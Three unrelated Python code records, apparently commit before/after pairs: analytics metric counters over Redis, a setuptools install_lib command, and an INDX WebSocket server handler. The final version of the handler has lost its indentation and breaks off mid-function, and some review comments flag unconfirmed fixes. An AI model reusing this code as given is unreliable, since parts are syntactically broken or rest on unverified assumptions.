    """
    conn = kwargs.get("connection", None)
    first_of_month = datetime.date(year=from_date.year, month=from_date.month, day=1)
    # monthly counters are stored in the same per-year hashes as the weekly ones
    metric_key_date_range = self._get_weekly_date_range(
        first_of_month, relativedelta(months=limit))
    date_generator = (first_of_month + relativedelta(months=i) for i in itertools.count())
    #generate a list of first_of_month's in between the start date and the end date
    series = list(itertools.islice(date_generator, limit))
    metric_keys = [self._get_monthly_metric_name(metric, month_date) for month_date in series]
    metric_func = lambda conn: [conn.hmget(
        self._get_weekly_metric_key(
            unique_identifier, metric_key_date), metric_keys) for metric_key_date in metric_key_date_range]
    if conn is not None:
        results = metric_func(conn)
    else:
        with self._analytics_backend.map() as conn:
            results = metric_func(conn)
    series, results = self._parse_and_process_metrics(series, results)
    return series, results
def get_metrics(self, metric_identifiers, from_date, limit=10, group_by="week", **kwargs):
    """
    Retrieves multiple metrics as efficiently as possible.
    :param metric_identifiers: a list of tuples of the form ``(unique_identifier, metric_name)`` identifying which metrics to retrieve.
    For example [('user:1', 'people_invited',), ('user:2', 'people_invited',), ('user:1', 'comments_posted',), ('user:2', 'comments_posted',)]
    :param from_date: A python date object
    :param limit: The total number of data points to retrieve starting from ``from_date``
    :param group_by: The type of aggregation to perform on the metric. Choices are: ``day``, ``week`` or ``month``
    """
    results = []
    #validation of types:
    allowed_types = {
        "day": self.get_metric_by_day,
        "week": self.get_metric_by_week,
        "month": self.get_metric_by_month,
    }
    if group_by.lower() not in allowed_types:
        raise Exception("Allowed values for group_by are day, week or month.")
    group_by_func = allowed_types[group_by.lower()]
    #pass a connection object so we can pipeline as much as possible
    with self._analytics_backend.map() as conn:
        for unique_identifier, metric in metric_identifiers:
            results.append(group_by_func(unique_identifier, metric, from_date, limit=limit, connection=conn))
    #we have to merge all the metric results afterwards because we are using a custom context processor
    # NOTE(review): values fetched inside the pipeline appear to resolve
    # only when the ``with`` block exits, hence the second parse — confirm
    return [
        self._parse_and_process_metrics(series, list_of_metrics) for
        series, list_of_metrics in results]
def get_count(self, unique_identifier, metric, start_date=None, end_date=None, **kwargs):
    """
    Gets the count for the ``metric`` for ``unique_identifier``. You can specify a ``start_date``
    and an ``end_date``, to only get metrics within that time range.
    :param unique_identifier: Unique string identifying the object this metric is for
    :param metric: A unique name for the metric you want to track
    :param start_date: Get the specified metrics after this date
    :param end_date: Get the specified metrics before this date
    :return: The count for the metric, 0 otherwise
    """
    result = None
    if start_date and end_date:
        # normalize: start <= end, and promote plain dates to datetimes
        start_date, end_date = (start_date, end_date,) if start_date < end_date else (end_date, start_date,)
        start_date = start_date if hasattr(start_date, 'date') else datetime.datetime.combine(start_date, datetime.time())
        end_date = end_date if hasattr(end_date, 'date') else datetime.datetime.combine(end_date, datetime.time())
        # every 1st-of-month that falls inside the range
        monthly_metrics_dates = list(rrule.rrule(rrule.MONTHLY, dtstart=start_date, bymonthday=1, until=end_date))
        #We can sorta optimize this by getting most of the data by month
        if len(monthly_metrics_dates) >= 3:
            # split into partial leading days + whole months + partial trailing days
            start_diff = monthly_metrics_dates[0] - start_date
            end_diff = end_date - monthly_metrics_dates[-1]
            with self._analytics_backend.map() as conn:
                monthly_metric_series, monthly_metric_results = self.get_metric_by_month(unique_identifier, metric, monthly_metrics_dates[0], limit=len(monthly_metrics_dates) - 1, connection=conn)
                #get the difference from the date to the start date and get all dates in between
                starting_metric_series, starting_metric_results = self.get_metric_by_day(unique_identifier, metric, start_date, limit=start_diff.days, connection=conn) if start_diff.days > 0 else ([], [[]],)
                ending_metric_series, ending_metric_results = self.get_metric_by_day(unique_identifier, metric, monthly_metrics_dates[-1], limit=end_diff.days + 1, connection=conn)
            # NOTE(review): re-parsed once the ``with`` block has run,
            # presumably so pipelined values are resolved — confirm
            monthly_metric_series, monthly_metric_results = self._parse_and_process_metrics(monthly_metric_series, monthly_metric_results)
            starting_metric_series, starting_metric_results = self._parse_and_process_metrics(starting_metric_series, starting_metric_results)
            ending_metric_series, ending_metric_results = self._parse_and_process_metrics(ending_metric_series, ending_metric_results)
            result = sum(monthly_metric_results.values()) + sum(starting_metric_results.values()) + sum(ending_metric_results.values())
        else:
            # short range: sum the daily counters directly
            diff = end_date - start_date
            metric_results = self.get_metric_by_day(unique_identifier, metric, start_date, limit=diff.days + 1)
            result = sum(metric_results[1].values())
    else:
        # no range given: read the lifetime counter
        try:
            result = int(self._analytics_backend.get(self._prefix + ":" + "analy:%s:count:%s" % (unique_identifier, metric,)))
        except TypeError:
            # missing key -> redis returned None
            result = 0
    return result
def get_counts(self, metric_identifiers, **kwargs):
    """
    Retrieves multiple all-time metric counts as efficiently as possible by
    pipelining all the backend reads over one mapped connection.
    :param metric_identifiers: a list of tuples of the form `(unique_identifier, metric_name`) identifying which metrics to retrieve.
    For example [('user:1', 'people_invited',), ('user:2', 'people_invited',), ('user:1', 'comments_posted',), ('user:2', 'comments_posted',)]
    :return: list of ints, one count per requested (identifier, metric) pair
    """
    with self._analytics_backend.map() as conn:
        raw_counts = []
        for uid, metric_name in metric_identifiers:
            raw_counts.append(conn.get(self._prefix + ":" + "analy:%s:count:%s" % (uid, metric_name,)))

    def _to_int(raw):
        # A missing key comes back as None; treat it as a zero count.
        try:
            return int(raw)
        except TypeError:
            return 0

    # Pipelined values are only usable after the ``with`` block has exited.
    return [_to_int(raw) for raw in raw_counts]
def set_metric_by_day(self, unique_identifier, metric, date, count, sync_arg, **kwargs):
    """
    Sets the count for the ``metric`` for ``unique_identifier`` on ``date``.
    Both ``unique_identifier`` and ``metric`` may be single values or
    collections, so several counters can be written in one pipelined pass.
    Not all backends may support this.
    :param unique_identifier: Unique string identifying the object this metric is for
    :param metric: A unique name for the metric you want to track
    :param date: Sets the specified metrics for this date
    :param count: Sets the specified metrics to the value of count
    :param sync_arg: Boolean used to determine if week and month counters should be updated as well
    """
    # Normalise both arguments to iterables of values.
    if isinstance(metric, basestring):
        metric = [metric]
    if not isinstance(unique_identifier, (types.ListType, types.TupleType, types.GeneratorType,)):
        unique_identifier = [unique_identifier]
    with self._analytics_backend.map() as conn:
        for identifier in unique_identifier:
            day_hash_key = self._get_daily_metric_key(identifier, date)
            for metric_name in metric:
                conn.hset(day_hash_key, self._get_daily_metric_name(metric_name, date), count)
    if sync_arg:
        # Recompute the weekly/monthly aggregates covering this single day.
        self.sync_agg_metric(unique_identifier, metric, date, date)
def sync_agg_metric(self, unique_identifier, metric, start_date, end_date, **kwargs):
    """
    Recalculates the weekly and monthly aggregate counters for ``metric`` and
    ``unique_identifier`` from the daily counters in the given date range.
    :param unique_identifier: Unique string identifying the object this metric is for
    :param metric: A unique name for the metric you want to track
    :param start_date: Date syncing starts
    :param end_date: Date syncing ends
    """
    # Weeks first, then months — same order as the individual sync helpers expect.
    for resync in (self.sync_week_metric, self.sync_month_metric):
        resync(unique_identifier, metric, start_date, end_date)
def sync_week_metric(self, unique_identifier, metric, start_date, end_date):
    """
    Recompute the weekly counters between ``start_date`` and ``end_date`` by
    summing the seven daily counters of each week that overlaps the range.
    :param unique_identifier: Unique string identifying the object this metric is for
    :param metric: A unique name for the metric you want to track
    :param start_date: Date syncing starts
    :param end_date: Date syncing ends
    """
    closest_monday_from_date = self._get_closest_week(start_date)
    num_weeks = self._num_weeks(start_date, end_date)
    # Removed dead assignment of self._get_weekly_date_range(...): its result was
    # never used (the helper is a pure date-range computation elsewhere in this class).
    # generate the Mondays in between the start date and the end date
    week_date_generator = (closest_monday_from_date + datetime.timedelta(days=i) for i in itertools.count(step=7))
    weeks_to_update = itertools.islice(week_date_generator, num_weeks)
    for week in weeks_to_update:
        # The weekly total is the sum of that week's seven daily counters.
        week_counter = sum(self.get_metric_by_day(unique_identifier, metric, week, 7)[1].values())
        hash_key_weekly = self._get_weekly_metric_key(unique_identifier, week)
        weekly_metric_name = self._get_weekly_metric_name(metric, week)
        with self._analytics_backend.map() as conn:
            conn.hset(hash_key_weekly, weekly_metric_name, week_counter)
def sync_month_metric(self, unique_identifier, metric, start_date, end_date):
    """
    Recompute the monthly counters between ``start_date`` and ``end_date`` by
    summing each month's daily counters.
    :param unique_identifier: Unique string identifying the object this metric is for
    :param metric: A unique name for the metric you want to track
    :param start_date: Date syncing starts
    :param end_date: Date syncing ends
    """
    num_months = self._num_months(start_date, end_date)
    first_of_month = datetime.date(year=start_date.year, month=start_date.month, day=1)
    # Removed dead assignment of self._get_weekly_date_range(...): its result was never used.
    month_date_generator = (first_of_month + relativedelta(months=i) for i in itertools.count())
    #generate a list of first_of_month's in between the start date and the end date
    months_to_update = itertools.islice(month_date_generator, num_months)
    for month in months_to_update:
        # Monthly total = sum of the daily counters for every day of that month.
        month_counter = sum(self.get_metric_by_day(unique_identifier, metric, month, monthrange(month.year, month.month)[1])[1].values())
        # BUG FIX: the hash key was built with _get_monthly_metric_name(unique_identifier, ...)
        # (a field-name helper handed an identifier) and the field name with the *weekly*
        # helper — a copy/paste from sync_week_metric. Use the monthly key/name helpers,
        # mirroring the weekly sync.
        # NOTE(review): assumes _get_monthly_metric_key exists symmetric to
        # _get_weekly_metric_key / _get_daily_metric_key — confirm against the class.
        hash_key_monthly = self._get_monthly_metric_key(unique_identifier, month)
        monthly_metric_name = self._get_monthly_metric_name(metric, month)
        with self._analytics_backend.map() as conn:
            conn.hset(hash_key_monthly, monthly_metric_name, month_counter)
|
import distutils.command.install_lib as orig
import os, imp
class install_lib(orig.install_lib):
    """Don't add compiled flags to filenames of non-Python files"""

    def run(self):
        """Build, install, then byte-compile the installed files."""
        self.build()
        outfiles = self.install()
        if outfiles is not None:
            # always compile, in case we have any extension stubs to deal with
            self.byte_compile(outfiles)

    def get_exclusions(self):
        """
        Return a dict (used as a set) of install paths that must not be
        written: the __init__ files of namespace packages, at every level of
        the package hierarchy, when installing single-version
        externally-managed.
        """
        exclude = {}
        nsp = self.distribution.namespace_packages
        svem = (nsp and self.get_finalized_command('install')
                .single_version_externally_managed)
        if svem:
            for pkg in nsp:
                # Exclude for the package and every parent package directory.
                parts = pkg.split('.')
                while parts:
                    pkgdir = os.path.join(self.install_dir, *parts)
                    for f in self._gen_exclude_names():
                        exclude[os.path.join(pkgdir, f)] = 1
                    parts.pop()
        return exclude

    @staticmethod
    def _gen_exclude_names():
        """
        Generate file paths to be excluded for namespace packages (bytecode
        cache files).
        """
        yield '__init__.py'
        yield '__init__.pyc'
        yield '__init__.pyo'
        if not hasattr(imp, 'get_tag'):
            return
        # DRY: compute the implementation-tagged __pycache__ base once instead
        # of repeating the whole join for each bytecode suffix.
        base = os.path.join('__pycache__', '__init__.' + imp.get_tag())
        yield base + '.pyc'
        yield base + '.pyo'

    def copy_tree(
            self, infile, outfile,
            preserve_mode=1, preserve_times=1, preserve_symlinks=0, level=1
    ):
        """Copy the tree, skipping any paths returned by get_exclusions()."""
        assert preserve_mode and preserve_times and not preserve_symlinks
        exclude = self.get_exclusions()

        if not exclude:
            return orig.install_lib.copy_tree(self, infile, outfile)

        # Exclude namespace package __init__.py* files from the output
        from setuptools.archive_util import unpack_directory
        from distutils import log

        outfiles = []

        def pf(src, dst):
            # Filter callback: return False to skip, or the destination path to copy.
            if dst in exclude:
                log.warn("Skipping installation of %s (namespace package)",
                         dst)
                return False

            log.info("copying %s -> %s", src, os.path.dirname(dst))
            outfiles.append(dst)
            return dst

        unpack_directory(infile, outfile, pf)
        return outfiles

    def get_outputs(self):
        """Report installed files, minus the excluded namespace __init__ files."""
        outputs = orig.install_lib.get_outputs(self)
        exclude = self.get_exclusions()
        if exclude:
            return [f for f in outputs if f not in exclude]
        return outputs
Extract calculation of base path
import distutils.command.install_lib as orig
import os, imp
class install_lib(orig.install_lib):
    """Don't add compiled flags to filenames of non-Python files"""

    def run(self):
        """Build and install, then byte-compile whatever was installed."""
        self.build()
        installed = self.install()
        # always compile, in case we have any extension stubs to deal with
        if installed is not None:
            self.byte_compile(installed)

    def get_exclusions(self):
        """
        Return a dict (keys used as a set) of install paths that should be
        skipped: namespace-package __init__ files at every package level,
        but only for single-version externally-managed installs.
        """
        excluded = {}
        namespace_pkgs = self.distribution.namespace_packages
        if not namespace_pkgs:
            return excluded
        install_cmd = self.get_finalized_command('install')
        if not install_cmd.single_version_externally_managed:
            return excluded
        for package in namespace_pkgs:
            # Walk from the package up through each parent directory.
            path_parts = package.split('.')
            while path_parts:
                package_dir = os.path.join(self.install_dir, *path_parts)
                for name in self._gen_exclude_names():
                    excluded[os.path.join(package_dir, name)] = 1
                path_parts.pop()
        return excluded

    @staticmethod
    def _gen_exclude_names():
        """
        Generate file paths to be excluded for namespace packages (bytecode
        cache files).
        """
        for name in ('__init__.py', '__init__.pyc', '__init__.pyo'):
            yield name
        if hasattr(imp, 'get_tag'):
            cache_base = os.path.join('__pycache__', '__init__.' + imp.get_tag())
            yield cache_base + '.pyc'
            yield cache_base + '.pyo'

    def copy_tree(
            self, infile, outfile,
            preserve_mode=1, preserve_times=1, preserve_symlinks=0, level=1
    ):
        """Copy the tree while filtering out the excluded namespace files."""
        assert preserve_mode and preserve_times and not preserve_symlinks
        excluded = self.get_exclusions()

        if not excluded:
            return orig.install_lib.copy_tree(self, infile, outfile)

        # Exclude namespace package __init__.py* files from the output
        from setuptools.archive_util import unpack_directory
        from distutils import log

        copied = []

        def pf(src, dst):
            # unpack filter: False skips the file, a path means "copy here".
            if dst in excluded:
                log.warn("Skipping installation of %s (namespace package)",
                         dst)
                return False
            log.info("copying %s -> %s", src, os.path.dirname(dst))
            copied.append(dst)
            return dst

        unpack_directory(infile, outfile, pf)
        return copied

    def get_outputs(self):
        """List installed files, dropping any excluded namespace files."""
        all_outputs = orig.install_lib.get_outputs(self)
        excluded = self.get_exclusions()
        if not excluded:
            return all_outputs
        return [path for path in all_outputs if path not in excluded]
|
# Copyright (C) 2011-2014 University of Southampton
# Copyright (C) 2011-2014 Daniel Alexander Smith
# Copyright (C) 2011-2014 Max Van Kleek
# Copyright (C) 2011-2014 Nigel R. Shadbolt
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License, version 3,
# as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import logging
import json
import cjson
import traceback
import StringIO
from twisted.internet.defer import Deferred
import indx_pg2 as database
from indx.crypto import auth_keys, rsa_sign
import indx.sync
from indx.reactor import IndxRequest
class IndxAsync:
    """ Abstracted logic for the INDX aynchronous (i.e. WebSocket) server. """

    def __init__(self, send_f, webserver, clientip):
        self.send_f = send_f # send messages function reference
        self.webserver = webserver
        self.clientip = clientip

    def receive(self, frame):
        """ Send data here when it is received from the real transport.

        Parses ``frame`` as JSON and dispatches on its 'action'/'respond_to'
        fields; any unexpected error results in a 500 frame being sent back.
        """
        try:
            def err_cb(failure):
                logging.error("WebSocketsHandler receive, err_cb: {0}".format(failure))

            data = json.loads(frame)
            requestid = data.get("requestid")

            if data.get("action") == "diff" and data.get("operation") == "update":
                # received after login_keys succeeds and we send the diff/start message
                # NOTE(review): self.remote_observer is only assigned in listen_remote();
                # a diff/update frame arriving before that raises AttributeError (caught below).
                self.remote_observer(data)
                return

            if data.get("action") == "http":
                # a call to an http request, over the websocket (via the reactor mappings)
                logging.debug("Async got an http request, data: {0}".format(data))
                request = data.get("request")

                #session = data.get("sessionid")
                session = None
                #if session is None:
                #    return self.send400(requestid, "http", data = {"error": "'sessionid' required in 'http'" })
                #session = self.sessionid # TODO enable multiple sessions per websocket

                logging.debug("Async got an http request: {0} in session {1}".format(request, session))

                def req_cb(response):
                    # Relay the reactor's HTTP response back through the websocket.
                    logging.debug("ASync sending http response in session: {0}".format(session))
                    frame = {"respond_to": "http", "response": response.to_json()}
                    if session is not None:
                        frame['session'] = session
                    self.sendJSON(requestid, frame, "http")

                indx_request = IndxRequest(
                    request.get("uri"),
                    request.get("method"),
                    request.get("path"),
                    request.get("params"),
                    request.get("content"),
                    session,
                    req_cb,
                    self.clientip
                )

                self.webserver.indx_reactor.incoming(indx_request)
                return

            elif data.get("action") == "echo":
                logging.debug("Async got an echo request: {0}".format(data))
                self.sendJSON(requestid, {}, "echo")
                return

            elif data.get('respond_to') == "login_keys":
                # a response to our attempt to re-connect back to the client
                logging.debug("Async got a respond to login_keys: {0}".format(data))
                # TODO handle errors
                self.sendJSON(requestid, {"action": "diff", "operation": "start"}, "login_keys")
                return

            elif data['action'] == "auth":
                def token_cb(token):
                    try:
                        if token is None:
                            self.send401(requestid, "auth")
                            return

                        logging.debug("WebSocketsHandler Auth by Token {0} successful.".format(data['token']))
                        self.tokens[token.id] = token

                        # also tell the webserver we just got a successful auth from an outside client via websocket
                        # so it can try to connect back over this websocket.
                        # self.webserver.

                        self.send200(requestid, "auth")
                        return
                    except Exception as e:
                        logging.error("WebSocketsHandler frameReceived, token error: {0}".format(e))
                        self.send401(requestid, "auth")
                        return

                self.tokenkeeper.get(data['token']).addCallbacks(token_cb, err_cb)

            # elif data['action'] == "get_session_id":
            #     self.send200(requestid, "auth", data = {'sessionid': self.sessionid})

            elif data['action'] == "login_keys":
                if requestid is None:
                    return self.send400(requestid, "login_keys", data = {"error": "'requestid' required for action 'login_keys'"})
                try:
                    signature, key_hash, algo, method, appid, encpk2 = data['signature'], data['key_hash'], data['algo'], data['method'], data['appid'], data['encpk2']
                except Exception as e:
                    logging.error("ASync login_keys error getting all parameters.")
                    return self.send400(requestid, "login_keys")

                def win(resp):
                    # authenticated now - state of this isn't saved though, we get a token immediately instead
                    username, password, boxid = resp
                    origin = "/ws" # TODO double-check this

                    # get token, return that
                    def got_acct(acct):
                        if acct == False:
                            return self.send401(requestid, "login_keys")

                        db_user, db_pass = acct

                        def token_cb(token):
                            def store_cb(store):
                                # success, send token back to user
                                # first, try to connect back through the websocket
                                self.tokens[token.id] = token
                                self.connectBackToClient(key_hash, store).addCallbacks(lambda empty: logging.debug("ASync, success connecting back."), lambda failure: logging.error("ASync, failure connecting back: {0}".format(failure)))
                                return self.send200(requestid, "login_keys", data = {"token": token.id})

                            token.get_store().addCallbacks(store_cb, lambda failure: self.send500(requestid, "login_keys"))

                        self.webserver.tokens.new(username,password,boxid,appid,origin,self.clientip,self.webserver.server_id).addCallbacks(token_cb, lambda failure: self.send500(requestid, "login_keys"))

                    self.webserver.database.lookup_best_acct(boxid, username, password).addCallbacks(got_acct, lambda conn: self.send401(requestid, "login_keys"))

                def fail(empty):
                    self.send401(requestid, "login_keys")

                auth_keys(self.webserver.keystore, signature, key_hash, algo, method, requestid, encpk2).addCallbacks(win, fail)

            elif data['action'] == "diff":
                # turn on/off diff listening
                if data['operation'] == "start":
                    token = data.get("token")
                    if token is None:
                        return self.send400(requestid, "diff", data = {"error": "'token' required for diff start"})
                    self.listen_diff(requestid, token)
                    self.send200(requestid, "diff")
                    return
                elif data['operation'] == "stop":
                    #self.stop_listen()
                    self.send200(requestid, "diff")
                    return
                else:
                    self.send400(requestid, "diff")
                    return
            else:
                action = data.get("action") # could be None
                self.send400(requestid, action)
                return
        except Exception as e:
            # NOTE(review): if json.loads itself failed, 'requestid'/'data' are
            # unbound here and this handler re-raises — pre-existing behavior.
            logging.error("WebSocketsHandler frameRecevied, error: {0},\n trace: {1}".format(e, traceback.format_exc()))
            self.send500(requestid, data.get("action"))
            return

    def connectBackToClient(self, public_key_hash, store):
        """ Try to connect back through this websocket to the other side. """
        logging.debug("ASync connectBackToClient, using hash {0}".format(public_key_hash))
        # look up IndxSync object by public_key_hash
        return_d = Deferred()

        # lookup model
        def model_cb(resp):
            model_id, boxid = resp
            all_models = [model_id]

            def sync_cb(indxsync):
                indxsync.sync_boxes(all_models = all_models, websocket = self).addCallbacks(return_d.callback, return_d.errback)

            self.webserver.sync_box(boxid).addCallbacks(sync_cb, return_d.errback)

        self.get_model_by_key(public_key_hash, store).addCallbacks(model_cb, return_d.errback)
        return return_d

    def listen_remote(self, private_key, key_hash, observer, remote_encpk2):
        """ Register ``observer`` for remote diffs and initiate a signed
        login_keys handshake over this websocket. Errors are logged, not raised.
        """
        # FIX: 'uuid' was never imported at module level, so uuid.uuid1() below
        # raised NameError (silently swallowed by the except). Import locally.
        import uuid
        self.remote_observer = observer
        keyauth = {"key_hash": key_hash, "private_key": private_key, "encpk2": remote_encpk2}
        try:
            SSH_MSG_USERAUTH_REQUEST = "50"
            method = "publickey"
            algo = "SHA512"
            key_hash, private_key, encpk2 = keyauth['key_hash'], keyauth['private_key'], keyauth['encpk2']

            if not (type(encpk2) == type("") or type(encpk2) == type(u"")):
                encpk2 = json.dumps(encpk2)

            requestid = "{0}".format(uuid.uuid1())
            ordered_signature_text = '{0}\t{1}\t"{2}"\t{3}\t{4}'.format(SSH_MSG_USERAUTH_REQUEST, requestid, method, algo, key_hash)
            signature = rsa_sign(private_key, ordered_signature_text)

            values = {"action": "login_keys", "signature": signature, "key_hash": key_hash, "algo": algo, "method": method, "appid": "INDX ASync", "encpk2": encpk2}
            self.sendJSON(None, values, None)
        except Exception as e:
            logging.error("ASync: {0}".format(e))

    def get_model_by_key(self, public_key_hash, store):
        """ Get the ID of a 'link' object, based on the hash of a public key it uses.
        Public keys are not reused, so it will only match one.
        """
        return_d = Deferred()

        query = {"type": indx.sync.NS_ROOT_BOX + "link",
                 "boxes":
                     {"key":
                          {"public-hash": public_key_hash}
                      }
                 }

        def query_cb(graph):
            modelid, boxname = None, None
            for obj_id, obj in graph.root_objects().items():
                modelid = obj_id
                for box in graph.get(obj_id).get("boxes"):
                    for key in graph.get(box.id).get("key"):
                        public_hash = graph.get(key.id).getOneValue("public-hash")
                        if public_hash != public_key_hash: # pick the box that doesn't match the key, i.e. our box
                            boxname = graph.get(box.id).getOneValue("box")
                            return_d.callback((modelid, boxname))
                            return
            return_d.errback(Exception("Could not find a model that uses the public key hash: {0}".format(public_key_hash)))

        store.query(query, render_json = False, depth = 4).addCallbacks(query_cb, return_d.errback)
        return return_d

    def connected(self):
        """ Called by WebSocketsHandler when the connection is completed through the real transport. """
        # TokenKeeper from the webserver. The "webserver" attribtue in site is added in server.py when we create the WebSocketsSite.
        self.tokenkeeper = self.webserver.tokens
        self.tokens = {} # tokenid -> token object
        self.send200(None, "connect", data = {})

    def listen_diff(self, requestid, tokenid):
        """ Subscribe this websocket to store diffs for the given token's box. """
        def err_cb(failure):
            logging.error("WebSocketsHandler listen_diff, err_cb: {0}".format(failure))

        def store_cb(store):
            logging.debug("WebSocketsHandler listen_diff, store_cb: {0}".format(store))

            def observer_local(diff):
                """ Receive an update from the server. """
                logging.debug("WebSocketsHandler listen_diff observer notified: {0}".format(diff))
                self.sendJSON(requestid, {"action": "diff", "operation": "update", "data": diff}, "diff")

            store.listen(observer_local) # no callbacks, nothing to do

        token = self.tokens.get(tokenid)
        if token is None:
            return self.send400(requestid, "diff", data = {"error": "token invalid (it must be authed successfully to this websocket to use it here)"})

        token.get_store().addCallbacks(store_cb, err_cb)

    def sendJSON(self, requestid, data, respond_to = None):
        """ Send data as JSON to the WebSocket. """
        logging.debug("ASync send JSON of data: {0}, requestid: {1}".format(data, requestid))
        #encoded = cjson.encode(data)
        try:
            if requestid:
                data.update({"requestid": requestid})
            if respond_to:
                data.update({"respond_to": respond_to})
            encoded = json.dumps(data)
            self.send_f(encoded)
        except Exception as e:
            logging.error("Async error sending JSON: {0}".format(e))

    def send500(self, requestid, respond_to, data = None):
        """ Send a 500 Internal Server Error frame, optionally merged with ``data``. """
        out = {"success": False, "error": "500 Internal Server Error"}
        if data is not None:
            out.update(data)
        self.sendJSON(requestid, out, respond_to)

    def send400(self, requestid, respond_to, data = None):
        """ Send a 400 Bad Request frame, optionally merged with ``data``. """
        out = {"success": False, "error": "400 Bad Request"}
        if data is not None:
            out.update(data)
        self.sendJSON(requestid, out, respond_to)

    def send401(self, requestid, respond_to, data = None):
        """ Send a 401 Unauthorized frame, optionally merged with ``data``. """
        out = {"success": False, "error": "401 Unauthorized"}
        if data is not None:
            out.update(data)
        self.sendJSON(requestid, out, respond_to)

    def send200(self, requestid, respond_to, data = None):
        """ Send a success frame, optionally merged with ``data``. """
        out = {"success": True}
        if data is not None:
            out.update(data)
        self.sendJSON(requestid, out, respond_to)
Handle errors in listen_diff correctly
# Copyright (C) 2011-2014 University of Southampton
# Copyright (C) 2011-2014 Daniel Alexander Smith
# Copyright (C) 2011-2014 Max Van Kleek
# Copyright (C) 2011-2014 Nigel R. Shadbolt
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License, version 3,
# as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import logging
import json
import cjson
import traceback
import StringIO
from twisted.internet.defer import Deferred
from twisted.python.failure import Failure
import indx_pg2 as database
from indx.crypto import auth_keys, rsa_sign
import indx.sync
from indx.reactor import IndxRequest
class IndxAsync:
""" Abstracted logic for the INDX aynchronous (i.e. WebSocket) server. """
def __init__(self, send_f, webserver, clientip):
self.send_f = send_f # send messages function reference
self.webserver = webserver
self.clientip = clientip
def receive(self, frame):
""" Send data here when it is received from the real transport. """
try:
def err_cb(failure):
logging.error("WebSocketsHandler receive, err_cb: {0}".format(failure))
data = json.loads(frame)
requestid = data.get("requestid")
if data.get("action") == "diff" and data.get("operation") == "update":
# received after login_keys succeeds and we send the diff/start message
self.remote_observer(data)
return
if data.get("action") == "http":
# a call to an http request, over the websocket (via the reactor mappings)
logging.debug("Async got an http request, data: {0}".format(data))
request = data.get("request")
#session = data.get("sessionid")
session = None
#if session is None:
# return self.send400(requestid, "http", data = {"error": "'sessionid' required in 'http'" })
#session = self.sessionid # TODO enable multiple sessions per websocket
logging.debug("Async got an http request: {0} in session {1}".format(request, session))
def req_cb(response):
logging.debug("ASync sending http response in session: {0}".format(session))
frame = {"respond_to": "http", "response": response.to_json()}
if session is not None:
frame['session'] = session
self.sendJSON(requestid, frame, "http")
indx_request = IndxRequest(
request.get("uri"),
request.get("method"),
request.get("path"),
request.get("params"),
request.get("content"),
session,
req_cb,
self.clientip
)
self.webserver.indx_reactor.incoming(indx_request)
return
elif data.get("action") == "echo":
logging.debug("Async got an echo request: {0}".format(data))
self.sendJSON(requestid, {}, "echo")
return
elif data.get('respond_to') == "login_keys":
# a response to our attempt to re-connect back to the client
logging.debug("Async got a respond to login_keys: {0}".format(data))
# TODO handle errors
self.sendJSON(requestid, {"action": "diff", "operation": "start"}, "login_keys")
return
elif data['action'] == "auth":
def token_cb(token):
try:
if token is None:
self.send401(requestid, "auth")
return
logging.debug("WebSocketsHandler Auth by Token {0} successful.".format(data['token']))
self.tokens[token.id] = token
# also tell the webserver we just got a successful auth from an outside client via websocket
# so it can try to connect back over this websocket.
# self.webserver.
self.send200(requestid, "auth")
return
except Exception as e:
logging.error("WebSocketsHandler frameReceived, token error: {0}".format(e))
self.send401(requestid, "auth")
return
self.tokenkeeper.get(data['token']).addCallbacks(token_cb, err_cb)
# elif data['action'] == "get_session_id":
# self.send200(requestid, "auth", data = {'sessionid': self.sessionid})
elif data['action'] == "login_keys":
if requestid is None:
return self.send400(requestid, "login_keys", data = {"error": "'requestid' required for action 'login_keys'"})
try:
signature, key_hash, algo, method, appid, encpk2 = data['signature'], data['key_hash'], data['algo'], data['method'], data['appid'], data['encpk2']
except Exception as e:
logging.error("ASync login_keys error getting all parameters.")
return self.send400(requestid, "login_keys")
def win(resp):
# authenticated now - state of this isn't saved though, we get a token immediately instead
username, password, boxid = resp
origin = "/ws" # TODO double-check this
# get token, return that
def got_acct(acct):
if acct == False:
return self.send401(requestid, "login_keys")
db_user, db_pass = acct
def token_cb(token):
def store_cb(store):
# success, send token back to user
# first, try to connect back through the websocket
self.tokens[token.id] = token
self.connectBackToClient(key_hash, store).addCallbacks(lambda empty: logging.debug("ASync, success connecting back."), lambda failure: logging.error("ASync, failure connecting back: {0}".format(failure)))
return self.send200(requestid, "login_keys", data = {"token": token.id})
token.get_store().addCallbacks(store_cb, lambda failure: self.send500(requestid, "login_keys"))
self.webserver.tokens.new(username,password,boxid,appid,origin,self.clientip,self.webserver.server_id).addCallbacks(token_cb, lambda failure: self.send500(requestid, "login_keys"))
self.webserver.database.lookup_best_acct(boxid, username, password).addCallbacks(got_acct, lambda conn: self.send401(requestid, "login_keys"))
def fail(empty):
self.send401(requestid, "login_keys")
auth_keys(self.webserver.keystore, signature, key_hash, algo, method, requestid, encpk2).addCallbacks(win, fail)
elif data['action'] == "diff":
# turn on/off diff listening
if data['operation'] == "start":
token = data.get("token")
if token is None:
return self.send400(requestid, "diff", data = {"error": "'token' required for diff start"})
def listen_cb(empty):
self.send200(requestid, "diff")
def diff_err_cb(failure):
failure.trap(Exception)
self.send400(requestid, "diff", data = {"error": "{0}".format(failure.value)})
self.listen_diff(requestid, token).addCallbacks(listen_cb, diff_err_cb)
return
elif data['operation'] == "stop":
#self.stop_listen()
self.send200(requestid, "diff")
return
else:
self.send400(requestid, "diff")
return
else:
action = data.get("action") # could be None
self.send400(requestid, action)
return
except Exception as e:
logging.error("WebSocketsHandler frameRecevied, error: {0},\n trace: {1}".format(e, traceback.format_exc()))
self.send500(requestid, data.get("action"))
return
def connectBackToClient(self, public_key_hash, store):
""" Try to connect back through this websocket to the other side. """
logging.debug("ASync connectBackToClient, using hash {0}".format(public_key_hash))
# look up IndxSync object by public_key_hash
return_d = Deferred()
# lookup model
